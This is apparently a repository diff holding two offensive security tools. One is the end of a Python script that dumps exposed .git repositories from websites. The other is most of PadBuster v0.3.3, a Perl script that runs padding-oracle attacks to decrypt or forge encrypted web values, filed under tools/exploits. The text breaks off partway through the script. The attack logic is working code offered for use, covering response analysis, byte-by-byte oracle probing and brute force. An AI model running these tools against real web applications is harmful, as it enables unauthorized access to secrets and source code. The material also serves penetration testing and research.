DownloadWorker,
|
||||
jobs,
|
||||
args=(url, directory, retry, timeout, follow_redirects, module))
|
||||
|
||||
if module == ".git":
|
||||
modules_path = os.path.join(directory, '.gitmodules')
|
||||
if os.path.exists(modules_path):
|
||||
module_dir = os.path.join(directory, ".git", "modules")
|
||||
os.makedirs(os.path.abspath(module_dir))
|
||||
with open(modules_path, 'r') as f:
|
||||
modules = f.read()
|
||||
|
||||
for module_name in re.findall(r'\[submodule \"(.*)\"\]', modules):
|
||||
printf("[-] Fetching module: %s\n", module_name)
|
||||
# os.makedirs(os.path.abspath(module_dir))
|
||||
module_url = url + "/.git/modules"
|
||||
fetch_git(module_url, module_dir, jobs, retry, timeout, follow_redirects, module=module_name)
|
||||
printf("[+] Done iterating module\n")
|
||||
|
||||
# find refs
|
||||
printf('[-] Finding refs/\n')
|
||||
tasks = [
|
||||
module + '/FETCH_HEAD',
|
||||
module + '/HEAD',
|
||||
module + '/ORIG_HEAD',
|
||||
module + '/config',
|
||||
module + '/info/refs',
|
||||
module + '/logs/HEAD',
|
||||
module + '/logs/refs/heads/master',
|
||||
module + '/logs/refs/remotes/origin/HEAD',
|
||||
module + '/logs/refs/remotes/origin/master',
|
||||
module + '/logs/refs/stash',
|
||||
module + '/packed-refs',
|
||||
module + '/refs/heads/master',
|
||||
module + '/refs/remotes/origin/HEAD',
|
||||
module + '/refs/remotes/origin/master',
|
||||
module + '/refs/stash',
|
||||
module + '/refs/wip/wtree/refs/heads/master', #Magit
|
||||
module + '/refs/wip/index/refs/heads/master' #Magit
|
||||
]
|
||||
|
||||
process_tasks(tasks,
|
||||
FindRefsWorker,
|
||||
jobs,
|
||||
args=(url, directory, retry, timeout, follow_redirects, module))
|
||||
|
||||
# find packs
|
||||
printf('[-] Finding packs\n')
|
||||
tasks = []
|
||||
|
||||
# use .git/objects/info/packs to find packs
|
||||
info_packs_path = os.path.join(directory, 'objects', 'info', 'packs')
|
||||
if os.path.exists(info_packs_path):
|
||||
with open(info_packs_path, 'r') as f:
|
||||
info_packs = f.read()
|
||||
|
||||
for sha1 in re.findall(r'pack-([a-f0-9]{40})\.pack', info_packs):
|
||||
tasks.append(module + '/objects/pack/pack-%s.idx' % sha1)
|
||||
tasks.append(module + '/objects/pack/pack-%s.pack' % sha1)
|
||||
|
||||
process_tasks(tasks,
|
||||
DownloadWorker,
|
||||
jobs,
|
||||
args=(url, directory, retry, timeout, follow_redirects))
|
||||
|
||||
# find objects
|
||||
printf('[-] Finding objects\n')
|
||||
objs = set()
|
||||
packed_objs = set()
|
||||
|
||||
# .git/packed-refs, .git/info/refs, .git/refs/*, .git/logs/*
|
||||
files = [
|
||||
os.path.join(directory, module, 'packed-refs'),
|
||||
os.path.join(directory, module, 'info', 'refs'),
|
||||
os.path.join(directory, module, 'FETCH_HEAD'),
|
||||
os.path.join(directory, module, 'ORIG_HEAD'),
|
||||
]
|
||||
|
||||
for dirpath, _, filenames in os.walk(os.path.join(directory, module, 'refs')):
|
||||
for filename in filenames:
|
||||
files.append(os.path.join(dirpath, filename))
|
||||
for dirpath, _, filenames in os.walk(os.path.join(directory, module, 'logs')):
|
||||
for filename in filenames:
|
||||
files.append(os.path.join(dirpath, filename))
|
||||
|
||||
for filepath in files:
|
||||
if not os.path.exists(filepath):
|
||||
continue
|
||||
|
||||
with open(filepath, 'r') as f:
|
||||
content = f.read()
|
||||
|
||||
for obj in re.findall(r'(^|\s)([a-f0-9]{40})($|\s)', content):
|
||||
obj = obj[1]
|
||||
objs.add(obj)
|
||||
|
||||
# use .git/index to find objects
|
||||
index_path = os.path.join(directory, module, 'index')
|
||||
if os.path.exists(index_path):
|
||||
index = dulwich.index.Index(index_path)
|
||||
|
||||
# index.iteritems()
|
||||
for entry in index.iteritems():
|
||||
if isinstance(entry[1], dulwich.index.IndexEntry):
|
||||
objs.add(entry[1].sha.decode())
|
||||
elif hasattr(entry[1], "decode"):
|
||||
objs.add(entry[1].decode())
|
||||
|
||||
# use packs to find more objects to fetch, and objects that are packed
|
||||
pack_file_dir = os.path.join(directory, module, 'objects', 'pack')
|
||||
if os.path.isdir(pack_file_dir):
|
||||
for filename in os.listdir(pack_file_dir):
|
||||
if filename.startswith('pack-') and filename.endswith('.pack'):
|
||||
pack_data_path = os.path.join(pack_file_dir, filename)
|
||||
pack_idx_path = os.path.join(pack_file_dir, filename[:-5] + '.idx')
|
||||
pack_data = dulwich.pack.PackData(pack_data_path)
|
||||
pack_idx = dulwich.pack.load_pack_index(pack_idx_path)
|
||||
pack = dulwich.pack.Pack.from_objects(pack_data, pack_idx)
|
||||
|
||||
for obj_file in pack.iterobjects():
|
||||
packed_objs.add(obj_file.sha().hexdigest())
|
||||
objs |= set(get_referenced_sha1(obj_file))
|
||||
|
||||
# fetch all objects
|
||||
printf('[-] Fetching objects\n')
|
||||
process_tasks(objs,
|
||||
FindObjectsWorker,
|
||||
jobs,
|
||||
args=(url, directory, retry, timeout, follow_redirects, module),
|
||||
tasks_done=packed_objs)
|
||||
|
||||
# git checkout
|
||||
if module == ".git":
|
||||
printf('[-] Running git checkout .\n')
|
||||
os.chdir(directory)
|
||||
|
||||
# ignore errors
|
||||
subprocess.call(['git', 'checkout', '.'], stderr=open(os.devnull, 'wb'))
|
||||
|
||||
return 0
|
||||
|
||||
|
||||
if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        usage='%(prog)s [options] URL DIR',
        description='Dump a git repository from a website.')
    parser.add_argument('url', metavar='URL',
                        help='url')
    parser.add_argument('--directory', metavar='DIR', default=None, type=str,
                        help='output directory')
    parser.add_argument('--proxy',
                        help='use the specified proxy')
    parser.add_argument('-j', '--jobs', type=int, default=10,
                        help='number of simultaneous requests')
    parser.add_argument('-r', '--retry', type=int, default=3,
                        help='number of request attempts before giving up')
    parser.add_argument('-t', '--timeout', type=int, default=3,
                        help='maximum time in seconds before giving up')
    parser.add_argument('-L', '--follow-redirects', default=False,
                        dest='follow_redirects', action="store_true",
                        help='follow redirects')
    args = parser.parse_args()

    # Reject non-positive numeric options up front.
    if args.jobs < 1:
        parser.error('invalid number of jobs')
    if args.retry < 1:
        parser.error('invalid number of retries')
    if args.timeout < 1:
        parser.error('invalid timeout')

    # Install a process-wide proxy by monkey-patching socket.socket.
    # A bare host:port spec (last pattern) is treated as SOCKS5.
    if args.proxy:
        proxy_specs = (
            (r'^socks5:(.*):(\d+)$', socks.PROXY_TYPE_SOCKS5),
            (r'^socks4:(.*):(\d+)$', socks.PROXY_TYPE_SOCKS4),
            (r'^http://(.*):(\d+)$', socks.PROXY_TYPE_HTTP),
            (r'^(.*):(\d+)$', socks.PROXY_TYPE_SOCKS5),
        )
        for spec, proxy_kind in proxy_specs:
            match = re.match(spec, args.proxy)
            if match is None:
                continue
            socks.setdefaultproxy(proxy_kind, match.group(1), int(match.group(2)))
            socket.socket = socks.socksocket
            break
        else:
            parser.error('invalid proxy')

    # Derive the output directory from the URL's hostname when not given.
    if args.directory is None:
        parsed = urllib.parse.urlparse(args.url)
        if parsed and parsed.hostname:
            args.directory = parsed.hostname
        else:
            parser.error('no output directory given and cannot derive from URL')

    # The target directory must exist (created on demand) and be empty.
    if not os.path.exists(args.directory):
        os.makedirs(args.directory)

    if not os.path.isdir(args.directory):
        parser.error('%s is not a directory' % args.directory)

    if os.listdir(args.directory):
        parser.error('%s is not empty' % args.directory)

    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

    # Fetch everything; if nothing at all was retrieved, remove the
    # (still empty) output directory again before exiting.
    target = os.path.realpath(args.directory)
    exit_code = fetch_git(args.url, args.directory, args.jobs, args.retry,
                          args.timeout, args.follow_redirects)
    if not os.listdir(target):
        os.rmdir(target)

    sys.exit(exit_code)
|
||||
890
tools/exploits/padBuster.pl
Executable file
890
tools/exploits/padBuster.pl
Executable file
@@ -0,0 +1,890 @@
|
||||
#!/usr/bin/perl
#
# PadBuster v0.3.3 - Automated script for performing Padding Oracle attacks
# Brian Holyfield - Gotham Digital Science (labs@gdssecurity.com)
#
# Credits to J.Rizzo and T.Duong for providing proof of concept web exploit
# techniques and S.Vaudenay for initial discovery of the attack. Credits also
# to James M. Martin (research@esptl.com) for sharing proof of concept exploit
# code for performing various brute force attack techniques, and wireghoul (Eldar
# Marcussen) for making code quality improvements.
#

use LWP::UserAgent;
use strict;
use warnings;
use Getopt::Std;
use MIME::Base64;
use URI::Escape;
use Getopt::Long;
use Time::HiRes qw( gettimeofday );
use Compress::Zlib;
use Crypt::SSLeay;

# Set defaults with $variable = value
# These globals hold the parsed command-line options; most are referenced
# directly by the subroutines further down in this file.
my $logFiles;               # -log: write per-request log files
my $post;                   # -post: HTTP POST body (switches method to POST)
my $encoding = 0;           # -encoding: 0=Base64, 1=lower hex, 2=upper hex, 3=.NET UrlToken, 4=websafe Base64
my $headers;                # -headers: extra headers, "name1::value1;name2::value2"
my $cookie;                 # -cookies: Cookie header value
my $error;                  # -error: padding-error marker string in the response
my $prefix;                 # -prefix: encoded bytes prepended to each test sample
my $intermediaryInput;      # -intermediate: known intermediate bytes (hex)
my $cipherInput;            # -ciphertext: ciphertext for the intermediate bytes (hex)
my $plainTextInput;         # -plaintext: plaintext to encrypt (encrypt mode)
my $encodedPlainTextInput;  # -encodedtext: plaintext to encrypt, pre-encoded
my $noEncodeOption;         # -noencode: do not URL-encode the payload
my $superVerbose;           # -veryverbose: debug-level output
my $proxy;                  # -proxy: HTTP/S proxy address:port
my $proxyAuth;              # -proxyauth: proxy credentials user:pass
my $noIv;                   # -noiv: sample does not include the IV
my $auth;                   # -auth: HTTP Basic credentials user:pass
my $resumeBlock;            # -resume: block number (or brute attempt) to resume at
my $interactive = 0;        # -interactive: confirm each decrypted byte
my $bruteForce;             # -bruteforce: brute force the first block
my $ignoreContent;          # -ignorecontent (parsed but see usage text)
my $useBody;                # -usebody: include response body in oracle signature
my $verbose;                # -verbose: verbose output

GetOptions( "log" => \$logFiles,
            "post=s" => \$post,
            "encoding=s" => \$encoding,
            "headers=s" => \$headers,
            "cookies=s" => \$cookie,
            "error=s" => \$error,
            "prefix=s" => \$prefix,
            "intermediate=s" => \$intermediaryInput,
            "ciphertext=s" => \$cipherInput,
            "plaintext=s" => \$plainTextInput,
            "encodedtext=s" => \$encodedPlainTextInput,
            "noencode" => \$noEncodeOption,
            "veryverbose" => \$superVerbose,
            "proxy=s" => \$proxy,
            "proxyauth=s" => \$proxyAuth,
            "noiv" => \$noIv,
            "auth=s" => \$auth,
            "resume=s" => \$resumeBlock,
            "interactive" => \$interactive,
            "bruteforce" => \$bruteForce,
            "ignorecontent" => \$ignoreContent,
            "usebody" => \$useBody,
            "verbose" => \$verbose);

print "\n+-------------------------------------------+\n";
print "| PadBuster - v0.3.3                        |\n";
print "| Brian Holyfield - Gotham Digital Science  |\n";
print "| labs\@gdssecurity.com                      |\n";
print "+-------------------------------------------+\n";

# Three positional arguments (URL, sample, block size) are mandatory.
if ($#ARGV < 2) {
    die "
Use: padBuster.pl URL EncryptedSample BlockSize [options]

Where: URL = The target URL (and query string if applicable)
       EncryptedSample = The encrypted value you want to test. Must
                         also be present in the URL, PostData or a Cookie
       BlockSize = The block size being used by the algorithm

Options:
    -auth [username:password]: HTTP Basic Authentication
    -bruteforce: Perform brute force against the first block
    -ciphertext [Bytes]: CipherText for Intermediate Bytes (Hex-Encoded)
    -cookies [HTTP Cookies]: Cookies (name1=value1; name2=value2)
    -encoding [0-4]: Encoding Format of Sample (Default 0)
                     0=Base64, 1=Lower HEX, 2=Upper HEX
                     3=.NET UrlToken, 4=WebSafe Base64
    -encodedtext [Encoded String]: Data to Encrypt (Encoded)
    -error [Error String]: Padding Error Message
    -headers [HTTP Headers]: Custom Headers (name1::value1;name2::value2)
    -interactive: Prompt for confirmation on decrypted bytes
    -intermediate [Bytes]: Intermediate Bytes for CipherText (Hex-Encoded)
    -log: Generate log files (creates folder PadBuster.DDMMYY)
    -noencode: Do not URL-encode the payload (encoded by default)
    -noiv: Sample does not include IV (decrypt first block)
    -plaintext [String]: Plain-Text to Encrypt
    -post [Post Data]: HTTP Post Data String
    -prefix [Prefix]: Prefix bytes to append to each sample (Encoded)
    -proxy [address:port]: Use HTTP/S Proxy
    -proxyauth [username:password]: Proxy Authentication
    -resume [Block Number]: Resume at this block number
    -usebody: Use response body content for response analysis phase
    -verbose: Be Verbose
    -veryverbose: Be Very Verbose (Debug Only)

";}
|
||||
|
||||
# Ok, if we've made it this far we are ready to begin..
my $url = $ARGV[0];
my $sample = $ARGV[1];
my $blockSize = $ARGV[2];

if ($url eq "" || $sample eq "" || $blockSize eq "") {
    print "\nERROR: The URL, EncryptedSample and BlockSize cannot be null.\n";
    exit();
}

# Hard Coded Inputs
#$post = "";
#$sample = "";

# A POST body implies the POST method; otherwise GET.
my $method = $post ? "POST" : "GET";

# These are file related variables (used by the -log machinery).
# NOTE(review): &getTime is defined elsewhere in this file.
my $dirName = "PadBuster." . &getTime("F");
my $dirSlash = "/";
my $dirCmd = "mkdir ";
if (defined($ENV{'OS'})) {
    # On Windows, switch to backslash separators and the "md" command.
    if ($ENV{OS} =~ /Windows/) {
        $dirSlash = "\\";
        $dirCmd = "md ";
    }
}
my $dirExists = 0;
my $printStats = 0;       # when 1, makeRequest prints periodic throughput stats
my $requestTracker = 0;   # total requests issued (incremented in makeRequest)
my $timeTracker = 0;      # cumulative request time (accumulated in makeRequest)

if ($encoding < 0 || $encoding > 4) {
    print "\nERROR: Encoding must be a value between 0 and 4\n";
    exit();
}
my $encodingFormat = $encoding ? $encoding : 0;

my $encryptedBytes = $sample;
my $totalRequests = 0;

# See if the sample needs to be URL decoded, otherwise don't (the plus from B64 will be a problem)
if ($sample =~ /\%/) {
    $encryptedBytes = &uri_unescape($encryptedBytes)
}

# Prep the sample for regex use (it is later used as a substitution pattern
# inside prepRequest, so metacharacters must be escaped).
$sample = quotemeta $sample;

# Now decode
$encryptedBytes = &myDecode($encryptedBytes, $encodingFormat);
if ( (length($encryptedBytes) % $blockSize) > 0) {
    print "\nERROR: Encrypted Bytes must be evenly divisible by Block Size ($blockSize)\n";
    print "       Encrypted sample length is ".int(length($encryptedBytes)).". Double check the Encoding and Block Size.\n";
    exit();
}

# If no IV, then append nulls as the IV (only if decrypting)
if ($noIv && !$bruteForce && !$plainTextInput) {
    $encryptedBytes = "\x00" x $blockSize . $encryptedBytes;
}

# PlainTextBytes is where the complete decrypted sample will be stored (decrypt only)
my $plainTextBytes;

# This is a bool to make sure we know where to replace the sample string
my $wasSampleFound = 0;

# ForgedBytes is where the complete forged sample will be stored (encrypt only)
my $forgedBytes;

# Isolate the IV into a separate byte array
my $ivBytes = substr($encryptedBytes, 0, $blockSize);

# Declare some optional elements for storing the results of the first test iteration
# to help the user if they don't know what the padding error looks like
my @oracleCantidates;
my $oracleSignature = "";   # the response signature chosen as "padding error"
my %oracleGuesses;          # signature -> observed frequency (analysis phase)
my %responseFileBuffer;     # signature -> full response text (for -log output)

# The block count should be the sample divided by the blocksize
my $blockCount = int(length($encryptedBytes)) / int($blockSize);

if (!$bruteForce && !$plainTextInput && $blockCount < 2) {
    print "\nERROR: There is only one block. Try again using the -noiv option.\n";
    exit();
}

# The attack works by sending in a real cipher text block along with a fake block in front of it
# You only ever need to send two blocks at a time (one real one fake) and just work through
# the sample one block at a time


# First, re-issue the original request to let the user know if something is potentially broken
my ($status, $content, $location, $contentLength) = &makeRequest($method, $url, $post, $cookie);

&myPrint("\nINFO: The original request returned the following",0);
&myPrint("[+] Status: $status",0);
&myPrint("[+] Location: $location",0);
&myPrint("[+] Content Length: $contentLength\n",0);
&myPrint("[+] Response: $content\n",1);

# -encodedtext overrides -plaintext after decoding.
$plainTextInput = &myDecode($encodedPlainTextInput,$encodingFormat) if $encodedPlainTextInput;
|
||||
|
||||
# Top-level mode dispatch: brute-force the first block, encrypt a supplied
# plaintext, or (the default) decrypt the sample one block at a time.
if ($bruteForce) {
    &myPrint("INFO: Starting PadBuster Brute Force Mode",0);
    my $bfAttempts = 0;

    print "INFO: Resuming previous brute force at attempt $resumeBlock\n" if $resumeBlock;

    # Only loop through the first 3 bytes...this should be enough as it
    # requires 16.5M+ requests

    my @bfSamples;
    my $sampleString = "\x00" x 2;
    # Pre-build all 65536 two-byte suffixes; the third (leading) byte is
    # cycled inside the request loop below.
    for my $c (0 ... 255) {
        substr($sampleString, 0, 1, chr($c));
        for my $d (0 ... 255) {
            substr($sampleString, 1, 1, chr($d));
            push (@bfSamples, $sampleString);
        }
    }

    foreach my $testVal (@bfSamples) {
        my $complete = 0;
        # $repeat forces a re-run of the 256-attempt inner pass (used once the
        # response-analysis phase finishes and picks an oracle signature).
        while ($complete == 0) {
            my $repeat = 0;
            for my $b (0 ... 255) {
                $bfAttempts++;
                if ( $resumeBlock && ($bfAttempts < ($resumeBlock - ($resumeBlock % 256)+1)) ) {
                    #SKIP
                } else {
                    # Forge a block: brute byte + two-byte suffix + null padding.
                    my $testBytes = chr($b).$testVal;
                    $testBytes .= "\x00" x ($blockSize-3);

                    my $combinedBf = $testBytes;
                    $combinedBf .= $encryptedBytes;
                    $combinedBf = &myEncode($combinedBf, $encoding);

                    # Add the Query String to the URL
                    my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedBf);

                    # Issue the request
                    my ($status, $content, $location, $contentLength) = &makeRequest($method, $testUrl, $testPost, $testCookies);

                    # Oracle signature: status / length / location, plus body if -usebody.
                    my $signatureData = "$status\t$contentLength\t$location";
                    $signatureData = "$status\t$contentLength\t$location\t$content" if $useBody;

                    if ($oracleSignature eq "") {
                        # No signature chosen yet: collect the first 256 responses,
                        # then ask the user which one is the padding error.
                        &myPrint("[+] Starting response analysis...\n",0) if ($b ==0);
                        $oracleGuesses{$signatureData}++;
                        $responseFileBuffer{$signatureData} = "Status: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content";
                        if ($b == 255) {
                            &myPrint("*** Response Analysis Complete ***\n",0);
                            &determineSignature();
                            $printStats = 1;
                            $timeTracker = 0;
                            $requestTracker = 0;
                            $repeat = 1;
                            $bfAttempts = 0;
                        }
                    }
                    if ($oracleSignature ne "" && $oracleSignature ne $signatureData) {
                        # Response differs from the padding-error signature: report it.
                        &myPrint("\nAttempt $bfAttempts - Status: $status - Content Length: $contentLength\n$testUrl\n",0);
                        &writeFile("Brute_Force_Attempt_".$bfAttempts.".txt", "URL: $testUrl\nPost Data: $testPost\nCookies: $testCookies\n\nStatus: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content");
                    }
                }
            }
            ($repeat == 1) ? ($complete = 0) : ($complete = 1);
        }
    }
} elsif ($plainTextInput) {
    # ENCRYPT MODE
    &myPrint("INFO: Starting PadBuster Encrypt Mode",0);

    # The block count will be the plaintext divided by blocksize (rounded up)
    my $blockCount = int(((length($plainTextInput)+1)/$blockSize)+0.99);
    &myPrint("[+] Number of Blocks: ".$blockCount."\n",0);

    # Apply PKCS#7-style padding to fill the final block.
    my $padCount = ($blockSize * $blockCount) - length($plainTextInput);
    $plainTextInput.= chr($padCount) x $padCount;

    # SampleBytes is the encrypted text you want to derive intermediate values for, so
    # copy the current ciphertext block into sampleBytes
    # Note, nulls are used if not provided and the intermediate values are brute forced

    $forgedBytes = $cipherInput ? &myDecode($cipherInput,1) : "\x00" x $blockSize;
    my $sampleBytes = $forgedBytes;

    # Work backwards from the last block: each round derives the previous
    # ciphertext block (or, finally, the IV).
    for (my $blockNum = $blockCount; $blockNum > 0; $blockNum--) {
        # IntermediaryBytes is where the intermediate bytes produced by the algorithm are stored
        my $intermediaryBytes;

        if ($intermediaryInput && $blockNum == $blockCount) {
            # User supplied the intermediate bytes for the last block directly.
            $intermediaryBytes = &myDecode($intermediaryInput,2);
        } else {
            $intermediaryBytes = &processBlock($sampleBytes);
        }

        # Now XOR the intermediate bytes with the corresponding bytes from the plain-text block
        # This will become the next ciphertext block (or IV if the last one)
        $sampleBytes = $intermediaryBytes ^ substr($plainTextInput, (($blockNum-1) * $blockSize), $blockSize);
        $forgedBytes = $sampleBytes.$forgedBytes;

        &myPrint("\nBlock ".($blockNum)." Results:",0);
        &myPrint("[+] New Cipher Text (HEX): ".&myEncode($sampleBytes,1),0);
        &myPrint("[+] Intermediate Bytes (HEX): ".&myEncode($intermediaryBytes,1)."\n",0);

    }
    $forgedBytes = &myEncode($forgedBytes, $encoding);
    chomp($forgedBytes);
} else {
    # DECRYPT MODE
    &myPrint("INFO: Starting PadBuster Decrypt Mode",0);

    if ($resumeBlock) {
        &myPrint("INFO: Resuming previous exploit at Block $resumeBlock\n",0);
    } else {
        $resumeBlock = 1
    }

    # Assume that the IV is included in our sample and that the first block is the IV
    for (my $blockNum = ($resumeBlock+1); $blockNum <= $blockCount; $blockNum++) {
        # Since the IV is the first block, our block count is artificially inflated by one
        &myPrint("*** Starting Block ".($blockNum-1)." of ".($blockCount-1)." ***\n",0);

        # SampleBytes is the encrypted text you want to break, so
        # lets copy the current ciphertext block into sampleBytes
        my $sampleBytes = substr($encryptedBytes, ($blockNum * $blockSize - $blockSize), $blockSize);

        # IntermediaryBytes is where the the intermediary bytes produced by the algorithm are stored
        my $intermediaryBytes = &processBlock($sampleBytes);

        # DecryptedBytes is where the decrypted block is stored
        my $decryptedBytes;

        # Now we XOR the decrypted byte with the corresponding byte from the previous block
        # (or IV if we are in the first block) to get the actual plain-text
        $blockNum == 2 ? $decryptedBytes = $intermediaryBytes ^ $ivBytes : $decryptedBytes = $intermediaryBytes ^ substr($encryptedBytes, (($blockNum - 2) * $blockSize), $blockSize);

        &myPrint("\nBlock ".($blockNum-1)." Results:",0);
        &myPrint("[+] Cipher Text (HEX): ".&myEncode($sampleBytes,1),0);
        &myPrint("[+] Intermediate Bytes (HEX): ".&myEncode($intermediaryBytes,1),0);
        &myPrint("[+] Plain Text: $decryptedBytes\n",0);
        $plainTextBytes = $plainTextBytes.$decryptedBytes;
    }
}
|
||||
|
||||
# Final summary: the forged ciphertext (encrypt mode) or the recovered
# plaintext in three encodings (decrypt mode).
&myPrint("-------------------------------------------------------",0);
&myPrint("** Finished ***\n", 0);
if ($plainTextInput) {
    &myPrint("[+] Encrypted value is: ".&uri_escape($forgedBytes),0);
} else {
    &myPrint("[+] Decrypted value (ASCII): $plainTextBytes\n",0);
    &myPrint("[+] Decrypted value (HEX): ".&myEncode($plainTextBytes,2)."\n", 0);
    &myPrint("[+] Decrypted value (Base64): ".&myEncode($plainTextBytes,0)."\n", 0);
}
&myPrint("-------------------------------------------------------\n",0);
|
||||
|
||||
# Present the collected response signatures (from %oracleGuesses) to the user
# and record the chosen one in the global $oracleSignature. Writes one log
# file per signature via &writeFile. Exits if every response was identical
# (nothing to distinguish a padding error by) unless in brute-force mode.
sub determineSignature {
    # Help the user detect the oracle response if an error string was not provided
    # This logic will automatically suggest the response pattern that occured most often
    # during the test as this is the most likeley one

    # Sort signatures by ascending frequency, so the most frequent is last.
    my @sortedGuesses = sort {$oracleGuesses{$a} <=> $oracleGuesses{$b}} keys %oracleGuesses;

    &myPrint("The following response signatures were returned:\n",0);
    &myPrint("-------------------------------------------------------",0);
    if ($useBody) {
        &myPrint("ID#\tFreq\tStatus\tLength\tChksum\tLocation",0);
    } else {
        &myPrint("ID#\tFreq\tStatus\tLength\tLocation",0);
    }
    &myPrint("-------------------------------------------------------",0);

    my $id = 1;

    foreach (@sortedGuesses) {
        my $line = $id;
        # Mark the most frequent signature (last in the sort) as recommended.
        ($id == $#sortedGuesses+1 && $#sortedGuesses != 0) ? $line.= " **" : $line.="";
        my @sigFields = split("\t", $_);
        $line .= "\t$oracleGuesses{$_}\t$sigFields[0]\t$sigFields[1]";
        # With -usebody, show a 32-bit checksum of the body instead of the body itself.
        $useBody ? ( $line .= "\t".unpack( '%32A*', $sigFields[3] ) ) : $line.="";
        $line .= "\t$sigFields[2]";
        &myPrint($line,0);
        &writeFile("Response_Analysis_Signature_".$id.".txt", $responseFileBuffer{$_});
        $id++;
    }
    &myPrint("-------------------------------------------------------",0);

    if ($#sortedGuesses == 0 && !$bruteForce) {
        &myPrint("\nERROR: All of the responses were identical.\n",0);
        &myPrint("Double check the Block Size and try again.",0);
        exit();
    } else {
        # Let the user pick which signature represents the padding error.
        my $responseNum = &promptUser("\nEnter an ID that matches the error condition\nNOTE: The ID# marked with ** is recommended");
        &myPrint("\nContinuing test with selection $responseNum\n",0);
        $oracleSignature = $sortedGuesses[$responseNum-1];
    }
}
|
||||
|
||||
# Build the concrete test request by substituting the encrypted sample with
# the current test bytes wherever it appears: in the URL, the POST body,
# and/or the cookies. Exits with an error if the sample is found nowhere.
# Returns ($testUrl, $testPost, $testCookies).
sub prepRequest {
    my ($reqUrl, $reqPost, $reqCookie, $needle, $payload) = @_;

    # Count how many request components actually contained the sample.
    # s/// returns the number of substitutions made (1 without /g).
    my $hits = 0;

    my $outUrl = $reqUrl;
    $hits++ if ($outUrl =~ s/$needle/$payload/);

    my $outPost = "";
    if ($reqPost) {
        $outPost = $reqPost;
        $hits++ if ($outPost =~ s/$needle/$payload/);
    }

    my $outCookies = "";
    if ($reqCookie) {
        $outCookies = $reqCookie;
        $hits++ if ($outCookies =~ s/$needle/$payload/);
    }

    # The attack cannot proceed if the sample is absent from the request.
    if ($hits == 0) {
        &myPrint("ERROR: Encrypted sample was not found in the test request",0);
        exit();
    }

    return ($outUrl, $outPost, $outCookies);
}
|
||||
|
||||
# Core padding-oracle routine: given one ciphertext block, recover and return
# its intermediate bytes by forging a fake preceding block and probing the
# oracle one byte at a time (last byte first). Reads/writes the globals
# $error, $oracleSignature, %oracleGuesses, %responseFileBuffer, $interactive.
sub processBlock {
    my ($sampleBytes) = @_;
    my $analysisMode;
    # Analysis mode is either 0 (response analysis) or 1 (exploit)
    $analysisMode = (!$error && $oracleSignature eq "") ? 0 : 1;

    # The return value of this subroutine is the intermediate text for the block
    my $returnValue;

    my $complete = 0;
    my $autoRetry = 0;   # set after the first full failure; allows one silent retry
    my $hasHit = 0;      # swallows one stale "success" right after an auto-retry

    while ($complete == 0) {
        # Reset the return value
        $returnValue = "";

        my $repeat = 0;

        # TestBytes are the fake bytes that are pre-pending to the cipher test for the padding attack
        my $testBytes = "\x00" x $blockSize;

        my $falsePositiveDetector = 0;

        # Work on one byte at a time, starting with the last byte and moving backwards
        OUTERLOOP:
        for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--) {
            INNERLOOP:
            for (my $i = 255; $i >= 0; $i--) {
                # Fuzz the test byte
                substr($testBytes, $byteNum, 1, chr($i));

                # Combine the test bytes and the sample
                my $combinedTestBytes = $testBytes.$sampleBytes;

                if ($prefix) {
                    $combinedTestBytes = &myDecode($prefix,$encodingFormat).$combinedTestBytes
                }

                $combinedTestBytes = &myEncode($combinedTestBytes, $encodingFormat);
                chomp($combinedTestBytes);

                if (! $noEncodeOption) {
                    $combinedTestBytes = &uri_escape($combinedTestBytes);
                }

                my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedTestBytes);

                # Ok, now make the request

                my ($status, $content, $location, $contentLength) = &makeRequest($method, $testUrl, $testPost, $testCookies);

                # Oracle signature: status / length / location, plus body if -usebody.
                my $signatureData = "$status\t$contentLength\t$location";
                $signatureData = "$status\t$contentLength\t$location\t$content" if $useBody;

                # If this is the first block and there is no padding error message defined, then cycle through
                # all possible requests and let the user decide what the padding error behavior is.
                if ($analysisMode == 0) {
                    &myPrint("INFO: No error string was provided...starting response analysis\n",0) if ($i == 255);
                    $oracleGuesses{$signatureData}++;

                    $responseFileBuffer{$signatureData} = "URL: $testUrl\nPost Data: $testPost\nCookies: $testCookies\n\nStatus: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content";

                    if ($byteNum == $blockSize - 1 && $i == 0) {
                        # All 256 probes for the last byte collected: pick a signature
                        # and restart the block in exploit mode.
                        &myPrint("*** Response Analysis Complete ***\n",0);
                        &determineSignature();
                        $analysisMode = 1;
                        $repeat = 1;
                        last OUTERLOOP;
                    }
                }

                my $continue = "y";

                # A "hit": the response does NOT look like a padding error.
                if (($error && $content !~ /$error/ && $location !~ /$error/) || ($oracleSignature ne "" && $oracleSignature ne $signatureData)) {
                    # This is for autoretry logic (only works on the first byte)
                    if ($autoRetry == 1 && ($byteNum == ($blockSize - 1) ) && $hasHit == 0 ) {
                        $hasHit++;
                    } else {
                        # If there was no padding error, then it worked
                        &myPrint("[+] Success: (".abs($i-256)."/256) [Byte ".($byteNum+1)."]",0);
                        &myPrint("[+] Test Byte:".&uri_escape(substr($testBytes, $byteNum, 1)),1);

                        # If continually getting a hit on attempt zero, then something is probably wrong
                        $falsePositiveDetector++ if ($i == 255);

                        if ($interactive == 1) {
                            $continue = &promptUser("Do you want to use this value (Yes/No/All)? [y/n/a]","",1);
                        }

                        if ($continue eq "y" || $continue eq "a") {
                            $interactive = 0 if ($continue eq "a");

                            # Next, calculate the decrypted byte by XORing it with the padding value
                            my ($currentPaddingByte, $nextPaddingByte);

                            # These variables could allow for flexible padding schemes (for now PCKS)
                            # For PCKS#7, the padding block is equal to chr($blockSize - $byteNum)
                            $currentPaddingByte = chr($blockSize - $byteNum);
                            $nextPaddingByte = chr($blockSize - $byteNum + 1);

                            my $decryptedByte = substr($testBytes, $byteNum, 1) ^ $currentPaddingByte;
                            &myPrint("[+] XORing with Padding Char, which is ".&uri_escape($currentPaddingByte),1);

                            # Prepend: bytes are recovered last-to-first.
                            $returnValue = $decryptedByte.$returnValue;
                            &myPrint("[+] Decrypted Byte is: ".&uri_escape($decryptedByte),1);

                            # Finally, update the test bytes in preparation for the next round, based on the padding used
                            for (my $k = $byteNum; $k < $blockSize; $k++) {
